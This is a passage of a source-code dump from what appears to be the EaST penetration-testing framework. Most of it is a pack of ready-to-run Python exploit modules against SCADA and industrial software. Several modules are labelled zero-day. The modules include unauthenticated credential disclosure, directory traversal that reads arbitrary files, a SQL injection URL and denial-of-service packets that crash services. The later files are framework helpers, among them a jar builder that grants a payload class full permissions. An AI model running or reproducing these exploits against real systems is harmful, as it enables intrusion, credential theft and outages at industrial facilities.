"Silverlight/GetPermissions.asp?username=test%%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL%20--" 44 | 45 | def run(self): 46 | #Get options from gui 47 | self.args() 48 | self.log("[*] Sending crafted request...") 49 | for i in range(10): 50 | try: 51 | urllib2.urlopen(self.url) 52 | except socket.error as error: 53 | if error.errno == errno.WSAECONNRESET: 54 | self.log("[+] Service is unavailable now") 55 | self.finish(True) 56 | self.log("All data sent...") 57 | self.finish(False) 58 | 59 | 60 | if __name__ == '__main__': 61 | """ 62 | By now we only have the tool 63 | mode for exploit.. 64 | Later we would have 65 | standalone mode also. 66 | """ 67 | print "Running exploit %s .. " % INFO['NAME'] 68 | e = exploit("192.168.0.1",80) 69 | e.run() 70 | -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_delta_DIAEnergie_info_disclosure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | import ssl 5 | import json 6 | import pprint 7 | from collections import OrderedDict 8 | from Sploit import Sploit 9 | 10 | 11 | INFO = {} 12 | INFO['NAME'] = "efs_delta_DIAEnergie_info_disclosure" 13 | INFO['DESCRIPTION'] = " Industrial Energy Management System DIAEnergie Information Disclosure" 14 | INFO['VENDOR'] = "http://www.deltaww.com" 15 | INFO["CVE Name"] = "0day" 16 | INFO["DOWNLOAD_LINK"] = "http://www.deltaww.com/services/DownloadCenter2.aspx?secID=8&pid=2&tid=0&CID=06&itemID=060702&typeID=1&downloadID=DIAEnergie,&title=DIAEnergie&dataType=8;&check=1&hl=en-US" 17 | INFO["LINKS"] = [] 18 | INFO['CHANGELOG'] = "30 Aug, 2017" 19 | INFO['PATH'] = "General/" 20 | INFO["NOTES"] = """ 21 | Vulnerability allows to show users credentials. Authentication is not required. 22 | Tested against DIAEnergie 1.5.90.91 on Windows 7 SP1 x64. 23 | """ 24 | 25 | # Must be in every module, to be set by framework 26 | OPTIONS = OrderedDict() 27 | OPTIONS["HOST"] = "192.168.1.176" 28 | OPTIONS["PORT"] = 80 29 | OPTIONS["SSL"] = False 30 | 31 | 32 | class exploit(Sploit): 33 | def __init__(self,host="", 34 | port=0, ssl=False, 35 | logger=None): 36 | Sploit.__init__(self, logger=logger) 37 | self.name = INFO['NAME'] 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 42 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 43 | self.ssl = self.args.get("SSL", OPTIONS["SSL"]) 44 | 45 | def make_url(self, path=''): 46 | proto = 'https' if self.ssl else 'http' 47 | url = '%s://%s:%s/%s' % (proto, self.host, self.port, path) 48 | return url 49 | 50 | def run(self): 51 | #Get options from gui 52 | self.args() 53 | url = self.make_url('') 54 | self.log('[*] Trying to connect to %s' % url) 55 | ctx = ssl.create_default_context() 56 | ctx.check_hostname = False 57 | ctx.verify_mode = ssl.CERT_NONE 58 | opener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx)) 59 | try: 60 | opener.open(url) 61 | except Exception as e: 62 | self.log(e) 63 | self.finish(False) 64 | self.log('[*] Trying to get admin\'s creds') 65 | resp = opener.open(self.make_url('DataHandler/WebApis/DIAE_usHandler.ashx?ttype=GetObject&pUid=1')).read() 66 | resp = json.loads(resp) 67 | self.log('[+]\r\n' + pprint.pformat(resp)) 68 | self.finish(True) 69 | 70 | 71 | if __name__ == '__main__': 72 | """ 73 | By now we only have the tool 74 | mode for exploit.. 75 | Later we would have 76 | standalone mode also. 77 | """ 78 | print "Running exploit %s .. " % INFO['NAME'] 79 | e = exploit("192.168.0.1",80) 80 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_eisbaer_scada_directory_traversal2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | from collections import OrderedDict 5 | 6 | from Sploit import Sploit 7 | 8 | INFO = {} 9 | INFO['NAME'] = "efs_eisbaer_scada_directory_traversal2" 10 | INFO['DESCRIPTION'] = "EisBaer Scada Smart-Client's Server Directory Traversal" 11 | INFO['VENDOR'] = "http://www.busbaer.de/" 12 | INFO["CVE Name"] = "0day" 13 | INFO["NOTES"] = """ 14 | Vulnerability allows unauthenticated user to read contents of arbitrary file on remote machine. 15 | Tested against version 2.1.1321.1942 on Windows 7 x64. 16 | """ 17 | INFO["DOWNLOAD_LINK"] = "http://www.busbaer.de/eiscomp,index,op,sub,op1,24.html" 18 | INFO["LINKS"] = [""] 19 | INFO['CHANGELOG'] = "27 Jun, 2017. Written by Gleg team." 20 | INFO['PATH'] = "General/" 21 | 22 | # Must be in every module, to be set by framework 23 | OPTIONS = OrderedDict() 24 | OPTIONS["HOST"] = "192.168.1.176" 25 | OPTIONS["PORT"] = 8000 26 | OPTIONS["HTTPS"] = False 27 | OPTIONS["FILENAME"] = "/windows/win.ini" 28 | 29 | 30 | class exploit(Sploit): 31 | def __init__(self, host="", 32 | port=0, ssl=False, 33 | logger=None): 34 | Sploit.__init__(self, logger=logger) 35 | self.name = INFO['NAME'] 36 | 37 | def args(self): 38 | self.args = Sploit.args(self, OPTIONS) 39 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 40 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 41 | self.https = self.args.get("HTTPS", OPTIONS["HTTPS"]) 42 | self.filename = self.args.get("FILENAME", OPTIONS["FILENAME"]) 43 | 44 | def make_url(self, path=''): 45 | protocol = "https" if self.https else "http" 46 | url = "%s://%s:%s/%s" % (protocol, self.host, self.port, path) 47 | return url 48 | 49 | def run(self): 50 | # Get options from gui 51 | self.args() 52 | self.log('[*] Trying to get contents of %s' % self.filename) 53 | url = self.make_url('Eisbaer.RESTServices/ReqCVFile?x=%s' % urllib2.quote(self.filename)) 54 | resp = urllib2.urlopen(url) 55 | if resp.code != 200: 56 | self.log("File is not exists") 57 | self.finish(False) 58 | content = resp.read() 59 | if len(content) < 10000: 60 | self.log('[+]\r\n' + content) 61 | self.writefile(content) 62 | self.finish(True) 63 | 64 | 65 | if __name__ == '__main__': 66 | """ 67 | By now we only have the tool 68 | mode for exploit.. 69 | Later we would have 70 | standalone mode also. 71 | """ 72 | print "Running exploit %s .. " % INFO['NAME'] 73 | e = exploit("192.168.0.1", 80) 74 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_eisbaer_scada_dt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | import os 5 | from collections import OrderedDict 6 | 7 | from Sploit import Sploit 8 | 9 | INFO = {} 10 | INFO['NAME'] = "efs_eisbaer_scada_dt" 11 | INFO['DESCRIPTION'] = "EisBaer Scada Webserver Directory Traversal" 12 | INFO['VENDOR'] = "http://www.busbaer.de/" 13 | INFO["CVE Name"] = "" 14 | INFO["NOTES"] = """ 15 | Vulnerability allows unauthenticated user read content of arbitrary file on remote machine. 16 | Tested against version 2.1 on Windows 7 x64. 17 | """ 18 | INFO["DOWNLOAD_LINK"] = "http://www.busbaer.de/eiscomp,index,op,sub,op1,24.html" 19 | INFO["LINKS"] = [""] 20 | INFO['CHANGELOG'] = "26 Apr, 2016. Written by Gleg team." 21 | INFO['PATH'] = "General/" 22 | 23 | # Must be in every module, to be set by framework 24 | OPTIONS = OrderedDict() 25 | OPTIONS["HOST"] = "192.168.1.222" 26 | OPTIONS["PORT"] = 80 27 | OPTIONS["HTTPS"] = False 28 | OPTIONS["FILENAME"] = "/../../../../../windows/win.ini" 29 | 30 | 31 | class exploit(Sploit): 32 | def __init__(self, host="", 33 | port=0, ssl=False, 34 | logger=None): 35 | Sploit.__init__(self, logger=logger) 36 | self.ports_map = {} 37 | 38 | def args(self): 39 | self.args = Sploit.args(self, OPTIONS) 40 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 41 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 42 | self.https = self.args.get("HTTPS", OPTIONS["HTTPS"]) 43 | self.filename = self.args.get("FILENAME", OPTIONS["FILENAME"]) 44 | protocol = "https" if self.https else "http" 45 | self.url = "{}://{}:{}".format(protocol, self.host, self.port) 46 | 47 | def run(self): 48 | # Get options from gui 49 | self.args() 50 | resp = urllib2.urlopen(self.url + self.filename) 51 | if resp.code != 200: 52 | self.log("File not exists") 53 | self.finish(False) 54 | content = resp.read() 55 | filename = os.path.basename(self.filename) 56 | self.writefile(content, filename) 57 | self.finish(True) 58 | 59 | 60 | if __name__ == '__main__': 61 | """ 62 | By now we only have the tool 63 | mode for exploit.. 64 | Later we would have 65 | standalone mode also. 66 | """ 67 | print "Running exploit %s .. " % INFO['NAME'] 68 | e = exploit("192.168.0.1", 80) 69 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_esa_automation_crew_webserver_dir_trav.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | 5 | from collections import OrderedDict 6 | from Sploit import Sploit 7 | 8 | 9 | INFO = {} 10 | INFO['NAME'] = 'efs_esa_automation_crew_webserver_dir_trav' 11 | INFO['DESCRIPTION'] = 'ESA-Automation Crew Webserver Directory Traveral' 12 | INFO['VENDOR'] = 'https://www.esa-automation.com/en/products/crew/' 13 | INFO['CVE Name'] = '0day' 14 | INFO['DOWNLOAD_LINK'] = 'https://www.esa-automation.com/en/category-downloads/' 15 | INFO['LINKS'] = [] 16 | INFO['CHANGELOG'] = '28 Feb 2018' 17 | INFO['PATH'] = 'Web/' 18 | INFO['NOTES'] = """Vulnerability allows remote attackers to disclose files. 19 | Authentication is not required to exploit this vulnerability. 20 | Tested against Crew 02.00.174 on Windows 7 SP1 x64. 21 | """ 22 | 23 | OPTIONS = OrderedDict() 24 | OPTIONS['HOST'] = '192.168.1.103' 25 | OPTIONS['PORT'] = 8080 26 | OPTIONS['FILENAME'] = '../../../../../../../../../../windows/win.ini' 27 | 28 | 29 | class exploit(Sploit): 30 | def __init__(self,host="", 31 | port=0, ssl=False, 32 | logger=None): 33 | Sploit.__init__(self, logger=logger) 34 | self.name = INFO['NAME'] 35 | 36 | def args(self): 37 | self.args = Sploit.args(self, OPTIONS) 38 | self.host = self.args.get('HOST', OPTIONS['HOST']) 39 | self.port = self.args.get('PORT', OPTIONS['PORT']) 40 | self.filename = self.args.get('FILENAME', OPTIONS['FILENAME']) 41 | 42 | def make_url(self, path=''): 43 | url = 'http://%s:%s/%s' % (self.host, self.port, path) 44 | return url 45 | 46 | def run(self): 47 | #Get options from gui 48 | self.args() 49 | url = self.make_url() 50 | self.log('[*] Checking connection to %s' % url) 51 | urllib2.urlopen(url) 52 | self.log('[*] Trying to disclose "%s"' % self.filename) 53 | self.filename = self.filename.replace('\\', '/').replace('..', '%2e%2e') 54 | url = self.make_url(self.filename) 55 | try: 56 | res = urllib2.urlopen(url).read() 57 | except urllib2.HTTPError as e: 58 | if e.code == 404: 59 | self.log('[-] File not found') 60 | self.finish(False) 61 | self.writefile(res, self.filename.split('/').pop()) 62 | if len(res) < 10000: 63 | self.log('[+]\r\n' + res) 64 | self.finish(True) 65 | 66 | 67 | if __name__ == '__main__': 68 | print "Running exploit %s .. " % INFO['NAME'] 69 | e = exploit("192.168.0.1", 80) 70 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_laquis_scada_directory_traversal.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | import json 5 | from collections import OrderedDict 6 | 7 | from Sploit import Sploit 8 | 9 | INFO = {} 10 | INFO['NAME'] = "efs_laquis_scada_directory_traversal" 11 | INFO['DESCRIPTION'] = "LAquis SCADA <= 4.1.0.3237 Directory Traversal" 12 | INFO['VENDOR'] = "http://laquisscada.com/" 13 | INFO["CVE Name"] = "" 14 | INFO["NOTES"] = """ 15 | Vulnerability allows unauthenticated user to read contents of arbitrary file on remote machine. 16 | Tested against LAquis SCADA 4.1.0.3066 on Windows 7 SP1 x64. 17 | """ 18 | INFO["DOWNLOAD_LINK"] = "http://laquisscada.com/index-3.html" 19 | INFO["LINKS"] = [""] 20 | INFO['CHANGELOG'] = "4 Jul, 2017. Written by Gleg team." 21 | INFO['PATH'] = "General/" 22 | 23 | # Must be in every module, to be set by framework 24 | OPTIONS = OrderedDict() 25 | OPTIONS["HOST"] = "192.168.1.176" 26 | OPTIONS["PORT"] = 1234 27 | OPTIONS["FILENAME"] = "../../../../../windows/win.ini" 28 | 29 | 30 | class exploit(Sploit): 31 | def __init__(self, host="", 32 | port=0, ssl=False, 33 | logger=None): 34 | Sploit.__init__(self, logger=logger) 35 | self.name = INFO['NAME'] 36 | 37 | def args(self): 38 | self.args = Sploit.args(self, OPTIONS) 39 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 40 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 41 | self.filename = self.args.get("FILENAME", OPTIONS["FILENAME"]) 42 | 43 | def make_url(self, path=''): 44 | url = "http://%s:%s/%s" % (self.host, self.port, path) 45 | return url 46 | 47 | def check(self): 48 | url = self.make_url() 49 | self.log('[*] Checking %s' % url) 50 | try: 51 | urllib2.urlopen(url) 52 | except: 53 | self.log('[-] Can\'t connect to %s' % url) 54 | self.finish(True) 55 | 56 | 57 | def run(self): 58 | # Get options from gui 59 | self.args() 60 | self.check() 61 | self.log('[*] Trying to get contents of %s' % self.filename) 62 | url = self.make_url(urllib2.quote(self.filename)) 63 | resp = urllib2.urlopen(url) 64 | if resp.code != 200: 65 | self.log("File is not exists") 66 | self.finish(False) 67 | content = resp.read() 68 | if len(content) < 10000: 69 | self.log('[+]\r\n' + content) 70 | self.writefile(content) 71 | self.finish(True) 72 | 73 | 74 | if __name__ == '__main__': 75 | """ 76 | By now we only have the tool 77 | mode for exploit.. 78 | Later we would have 79 | standalone mode also. 80 | """ 81 | print "Running exploit %s .. " % INFO['NAME'] 82 | e = exploit("192.168.0.1", 80) 83 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_logi_cals_logi_RTS_RTShttpd_DoS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import socket 3 | from collections import OrderedDict 4 | 5 | 6 | from Sploit import Sploit 7 | 8 | INFO = {} 9 | INFO['NAME'] = "efs_logi_cals_logi_RTS_RTShttpd_DoS" 10 | INFO['DESCRIPTION'] = "logi.cals logi.RTS RTShttpd DoS" 11 | INFO['VENDOR'] = "https://www.logicals.com/" 12 | INFO["CVE Name"] = "" 13 | INFO["NOTES"] = """ 14 | Vulnerability exists in webserver. Special TCP packet cause DoS. 15 | Tested against logi.RTS RTShttpd.exe on Windows 7 x64 SP1. 16 | """ 17 | INFO["DOWNLOAD_LINK"] = "https://www.logicals.com/en/support/downloads" 18 | INFO["LINKS"] = [] 19 | INFO['CHANGELOG'] = "30 Mar, 2018" 20 | INFO['PATH'] = "General/" 21 | 22 | # Must be in every module, to be set by framework 23 | OPTIONS = OrderedDict() 24 | OPTIONS["HOST"] = "192.168.1.103" 25 | OPTIONS["PORT"] = 80 26 | 27 | 28 | class exploit(Sploit): 29 | def __init__(self,host="", 30 | port=0, ssl=False, 31 | logger=None): 32 | Sploit.__init__(self, logger=logger) 33 | self.name = INFO['NAME'] 34 | 35 | def args(self): 36 | self.args = Sploit.args(self, OPTIONS) 37 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 38 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 39 | 40 | def run(self): 41 | #Get options from gui 42 | self.args() 43 | s = socket.socket() 44 | s.settimeout(5) 45 | self.log('[*] Trying to connect to %s:%s' % (self.host, self.port)) 46 | s.connect((self.host, self.port)) 47 | dos = 'GET /1 HTTP/1.1\r\nDOS\r\n\r\n' 48 | s.send(dos) 49 | try: 50 | s.recv(1024) 51 | except socket.timeout: 52 | self.log('[+] RTShttpd service is unavailable') 53 | self.finish(True) 54 | self.finish(False) 55 | 56 | 57 | 58 | if __name__ == '__main__': 59 | """ 60 | By now we only have the tool 61 | mode for exploit.. 62 | Later we would have 63 | standalone mode also. 64 | """ 65 | print "Running exploit %s .. " % INFO['NAME'] 66 | e = exploit("192.168.0.1",80) 67 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_logi_cals_logi_RTS_dir_trav.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import urllib2 3 | import base64 4 | from collections import OrderedDict 5 | 6 | 7 | from Sploit import Sploit 8 | 9 | INFO = {} 10 | INFO['NAME'] = "efs_logi_cals_logi_RTS_dir_trav" 11 | INFO['DESCRIPTION'] = "logi.cals logi.RTS Directory Traversal" 12 | INFO['VENDOR'] = "https://www.logicals.com/" 13 | INFO["CVE Name"] = "" 14 | INFO["NOTES"] = """ 15 | Vulnerability exists in webserver. Remote attacker can disclose arbitrary file on remote machine using "../" combination. 16 | Tested against logi.RTS RTShttpd.exe on Windows 7 x64 SP1. 17 | """ 18 | INFO["DOWNLOAD_LINK"] = "https://www.logicals.com/en/support/downloads" 19 | INFO["LINKS"] = [] 20 | INFO['CHANGELOG'] = "30 Mar, 2018" 21 | INFO['PATH'] = "General/" 22 | 23 | # Must be in every module, to be set by framework 24 | OPTIONS = OrderedDict() 25 | OPTIONS["HOST"] = "192.168.1.103" 26 | OPTIONS["PORT"] = 80 27 | OPTIONS["FILENAME"] = "../../../../../../Windows/win.ini" 28 | 29 | 30 | class exploit(Sploit): 31 | def __init__(self,host="", 32 | port=0, ssl=False, 33 | logger=None): 34 | Sploit.__init__(self, logger=logger) 35 | self.payload = "" 36 | 37 | def args(self): 38 | self.args = Sploit.args(self, OPTIONS) 39 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 40 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 41 | self.filename = self.args.get("FILENAME", OPTIONS["FILENAME"]) 42 | 43 | def make_url(self, path=''): 44 | url = 'http://{}:{}/'.format(self.host, self.port) + path 45 | return url 46 | 47 | def run(self): 48 | #Get options from gui 49 | self.args() 50 | url = self.make_url() 51 | self.log('[*] Trying to connect to {}'.format(url)) 52 | urllib2.urlopen(url) 53 | self.log('[*] Trying to get content of {}'.format(self.filename)) 54 | url = self.make_url(self.filename) 55 | data = urllib2.urlopen(url).read() 56 | if len(data) < 10000: 57 | self.log('[+]\r\n' + data) 58 | self.writefile(data) 59 | self.finish(True) 60 | 61 | 62 | 63 | if __name__ == '__main__': 64 | """ 65 | By now we only have the tool 66 | mode for exploit.. 67 | Later we would have 68 | standalone mode also. 69 | """ 70 | print "Running exploit %s .. " % INFO['NAME'] 71 | e = exploit("192.168.0.1",80) 72 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_loytec_lweb900_server_dir_trav.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import urllib2 3 | import base64 4 | from collections import OrderedDict 5 | 6 | 7 | from Sploit import Sploit 8 | 9 | INFO = {} 10 | INFO['NAME'] = "efs_loytec_lweb900_server_dir_trav" 11 | INFO['DESCRIPTION'] = "Loytec LWEB-900 Directory Traversal" 12 | INFO['VENDOR'] = "https://www.logicals.com/" 13 | INFO["CVE Name"] = "" 14 | INFO["DOWNLOAD_LINK"] = "https://www.loytec.com/support/download/cat_view/13-software" 15 | INFO["LINKS"] = [] 16 | INFO['CHANGELOG'] = "4 Apr, 2018" 17 | INFO['PATH'] = "General/" 18 | INFO["NOTES"] = """ 19 | Vulnerability exists in LWEB-900 server in ProjectLWeb802Service. 20 | Remote attacker can disclose arbitrary file on remote machine using ".../" combination. Authentication is not required. 21 | Tested against LWEB-900 2.2.2 on Windows 7 x64 SP1. 22 | """ 23 | 24 | # Must be in every module, to be set by framework 25 | OPTIONS = OrderedDict() 26 | OPTIONS["HOST"] = "192.168.1.103" 27 | OPTIONS["PORT"] = 8080 28 | OPTIONS["FILENAME"] = "windows/win.ini" 29 | 30 | 31 | class exploit(Sploit): 32 | def __init__(self,host="", 33 | port=0, ssl=False, 34 | logger=None): 35 | Sploit.__init__(self, logger=logger) 36 | self.payload = "" 37 | 38 | def args(self): 39 | self.args = Sploit.args(self, OPTIONS) 40 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 41 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 42 | self.filename = self.args.get("FILENAME", OPTIONS["FILENAME"]) 43 | 44 | def make_url(self, path=''): 45 | url = 'http://{}:{}/'.format(self.host, self.port) + path 46 | return url 47 | 48 | def run(self): 49 | #Get options from gui 50 | self.args() 51 | url = self.make_url() 52 | self.log('[*] Trying to connect to {}'.format(url)) 53 | try: 54 | urllib2.urlopen(url) 55 | except urllib2.HTTPError as e: 56 | if e.code == 404: 57 | pass 58 | self.log('[*] Trying to get content of {}'.format(self.filename)) 59 | url = self.make_url('lweb900/' + '.../'*6 + self.filename) 60 | data = urllib2.urlopen(url).read() 61 | if len(data) < 10000: 62 | self.log('[+]\r\n' + data) 63 | self.writefile(data) 64 | self.finish(True) 65 | 66 | 67 | if __name__ == '__main__': 68 | """ 69 | By now we only have the tool 70 | mode for exploit.. 71 | Later we would have 72 | standalone mode also. 73 | """ 74 | print "Running exploit %s .. " % INFO['NAME'] 75 | e = exploit("192.168.0.1",80) 76 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_lsis_XP_Manager_DoS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import socket 4 | import struct 5 | import time 6 | from collections import OrderedDict 7 | from Sploit import Sploit 8 | 9 | INFO = {} 10 | INFO['NAME'] = "efs_lsis_XP_Manager_DoS" 11 | INFO['DESCRIPTION'] = "LSIS XP-Manager DoS" 12 | INFO['VENDOR'] = "http://www.lsis.com" 13 | INFO["CVE Name"] = "0day" 14 | INFO["NOTES"] = """ 15 | Vulnerability allows remote attacker to crash a XP-Server. 16 | Tested against XP-Manager V2.03 on Windows 7 x64. 17 | """ 18 | INFO["DOWNLOAD_LINK"] = "http://www.lsis.com/support/download/" 19 | INFO["LINKS"] = [""] 20 | INFO['CHANGELOG'] = "21 Feb, 2018. Written by Gleg team." 21 | INFO['PATH'] = "General/" 22 | 23 | # Must be in every module, to be set by framework 24 | OPTIONS = OrderedDict() 25 | OPTIONS["HOST"] = "192.168.1.103" 26 | OPTIONS["PORT"] = 2143 27 | 28 | 29 | class exploit(Sploit): 30 | def __init__(self, host="", 31 | port=0, ssl=False, 32 | logger=None): 33 | Sploit.__init__(self, logger=logger) 34 | self.name = INFO['NAME'] 35 | 36 | def args(self): 37 | self.args = Sploit.args(self, OPTIONS) 38 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 39 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 40 | 41 | def send(self, data): 42 | self.sock.send(data) 43 | res = self.sock.recv(16000) 44 | print repr(res) 45 | return res 46 | 47 | def run(self): 48 | # Get options from gui 49 | self.args() 50 | self.log('[*] Trying to connect to %s:%s' % (self.host, self.port)) 51 | self.sock = socket.socket() 52 | self.sock.connect((self.host, self.port)) 53 | garb = 'A' * 2000 54 | data = "\x0a\x05\x00\x00\x20\xf5\x00\x8c\x5a\xf5\x00\x8c\x5a\xf5\x00\x8c\x5a" + \ 55 | struct.pack(" 1 and type(value[1] is dict): 30 | ext_options = value[1] 31 | value = value[0] 32 | if type(value) is int: 33 | res[option] = dict(type="int", value=value) 34 | elif type(value) is bool: 35 | res[option] = dict(type="bool", value=value) 36 | elif type(value) is dict: 37 | res[option] = value 38 | res[option]["type"] = "list" 39 | else: 40 | res[option] = dict(type="string", value=value) 41 | res[option].update(ext_options) 42 | return res 43 | -------------------------------------------------------------------------------- /core/ServiceMessagesHandler.py: -------------------------------------------------------------------------------- 1 | from itertools import groupby 2 | 3 | class ServiceMessageLevel: 4 | DEBUG = 1 5 | INFO = 2 6 | WARNING = 3 7 | ERROR = 4 8 | 9 | 10 | class ServiceMessageType: 11 | IMPORT = 1 12 | UPDATES = 2 13 | 14 | 15 | class ServiceMessage: 16 | def __init__(self, message, message_type, level, **kwargs): 17 | self.message = message 18 | self.message_type = message_type 19 | self.level = level 20 | self.module_to_import = kwargs.get('module_to_import') 21 | self.module_with_unknown_import = kwargs.get('module_with_unknown_import') 22 | 23 | def serialize(self): 24 | return self.__dict__ 25 | 26 | 27 | class ServiceMessagesHandler: 28 | def __init__(self): 29 | self.messages = [] 30 | 31 | def reset(self): 32 | self.messages = [] 33 | 34 | def remove_import_error(self, library_name): 35 | self.messages = filter(lambda x: x.module_to_import != library_name, self.messages) 36 | 37 | def get_grouped(self): 38 | from collections import defaultdict 39 | messages = [] 40 | messages_by_import = defaultdict(list) 41 | for message in self.messages: 42 | if message.message_type == ServiceMessageType.IMPORT: 43 | messages_by_import[message.module_to_import].append((message.module_with_unknown_import)) 44 | else: 45 | messages.append(message.serialize()) 46 | map_fn = lambda x: dict(message='Modules %s require python module %s' % (', '.join(x[1]), x[0]), 47 | message_type=ServiceMessageType.IMPORT, 48 | module_to_import=x[0], 49 | level=ServiceMessageLevel.ERROR, 50 | installed=False 51 | ) 52 | messages_by_import = map(map_fn, messages_by_import.items()) 53 | return messages + messages_by_import 54 | 55 | def serialize(self): 56 | return [message.serialize() for message in self.messages] 57 | 58 | def add_message(self, message, message_type=ServiceMessageType.IMPORT, level=ServiceMessageLevel.ERROR, **kwargs): 59 | msg = ServiceMessage(message, message_type, level, **kwargs) 60 | if msg.serialize() in self.serialize(): 61 | return 62 | self.messages.append(ServiceMessage(message, message_type, level, **kwargs)) 63 | 64 | def get_messages(self, message_type=None, level=None): 65 | msgs = filter(lambda item: (item.message_type == message_type if message_type else True) 66 | and (item.level == level if level else True), self.messages) 67 | return [msg.serialize() for msg in msgs] 68 | -------------------------------------------------------------------------------- /core/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C0reL0ader/EaST/4b1ab5333022bbd476e9a43f13c4a4b559488752/core/__init__.py -------------------------------------------------------------------------------- /core/helpers/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C0reL0ader/EaST/4b1ab5333022bbd476e9a43f13c4a4b559488752/core/helpers/__init__.py -------------------------------------------------------------------------------- /core/helpers/archieve/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C0reL0ader/EaST/4b1ab5333022bbd476e9a43f13c4a4b559488752/core/helpers/archieve/__init__.py -------------------------------------------------------------------------------- /core/helpers/archieve/jar.py: -------------------------------------------------------------------------------- 1 | from zip import Zip 2 | import os 3 | 4 | class Jar(Zip): 5 | def __init__(self, filename=''): 6 | Zip.__init__(self, filename) 7 | self.manifest = self.get_manifest() 8 | self.is_manifest_created = False 9 | 10 | def get_manifest(self, main_class='east.Payload'): 11 | manifest = 'Manifest-Version: 1.0\n' 12 | manifest += 'Main-Class: %s\n' % main_class 13 | manifest += 'Permissions: all-permissions\n\n' 14 | return manifest 15 | 16 | def add_file(self, name, content='', write_to_manifest=True): 17 | Zip.add_file(self, name, content) 18 | if write_to_manifest: 19 | self.__add_file_to_manifest(name) 20 | 21 | def __add_file_to_manifest(self, filename): 22 | self.manifest += "Name: {filename}\n\n".format(filename=filename) 23 | 24 | def create_manifest(self): 25 | self.add_file("META-INF/MANIFEST.MF", self.manifest, write_to_manifest=False) 26 | self.is_manifest_created = True 27 | 28 | def get_raw(self, remove_temp=False): 29 | if not self.is_manifest_created: 30 | self.create_manifest() 31 | if not self.name: 32 | print('You should create jar file before get raw content') 33 | with open(self.name, 'rb') as f: 34 | content = f.read() 35 | if remove_temp: 36 | os.remove(self.name) 37 | return content 38 | 39 | def get_jar(self): 40 | if not self.is_manifest_created: 41 | self.create_manifest() 42 | return self.name 43 | -------------------------------------------------------------------------------- /core/helpers/archieve/zip.py: -------------------------------------------------------------------------------- 1 | import zipfile 2 | import os 3 | 4 | class Zip: 5 | def __init__(self, filename=''): 6 | self.name = filename 7 | self.files = [] 8 | if filename: 9 | self.create_archieve(filename) 10 | 11 | def create_archieve(self, filename): 12 | if not self.name: 13 | self.name = filename 14 | zf = zipfile.ZipFile(filename, 'w') 15 | zf.close() 16 | 17 | def add_file(self, name, content=''): 18 | if not self.is_valid(name): 19 | return 20 | zf = zipfile.ZipFile(self.name, 'a') 21 | if content: 22 | zf.writestr(name, content) 23 | else: 24 | zf.write(name) 25 | zf.close() 26 | self.files 27 | 28 | 29 | def is_valid(self, filename=''): 30 | if not self.name: 31 | raise Exception("Error. Zip archieve is not created.") 32 | return False 33 | if not zipfile.is_zipfile(self.name): 34 | raise Exception("Error. File {name} is not zip archieve.".format(name=self.name)) 35 | return False 36 | if filename and filename in self.files: 37 | raise Exception("Error. There is file with the same name.") 38 | return False 39 | return True 40 | -------------------------------------------------------------------------------- /core/helpers/java/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C0reL0ader/EaST/4b1ab5333022bbd476e9a43f13c4a4b559488752/core/helpers/java/__init__.py -------------------------------------------------------------------------------- /data/CVE-2015-8103/serialized_class_loader: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C0reL0ader/EaST/4b1ab5333022bbd476e9a43f13c4a4b559488752/data/CVE-2015-8103/serialized_class_loader -------------------------------------------------------------------------------- /data/CVE-2015-8103/serialized_file_writer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C0reL0ader/EaST/4b1ab5333022bbd476e9a43f13c4a4b559488752/data/CVE-2015-8103/serialized_file_writer -------------------------------------------------------------------------------- /data/CVE-2015-8103/serialized_jenkins_header: -------------------------------------------------------------------------------- 1 | Protocol:CLI-connect -------------------------------------------------------------------------------- /data/CVE-2015-8103/serialized_payload_footer: -------------------------------------------------------------------------------- 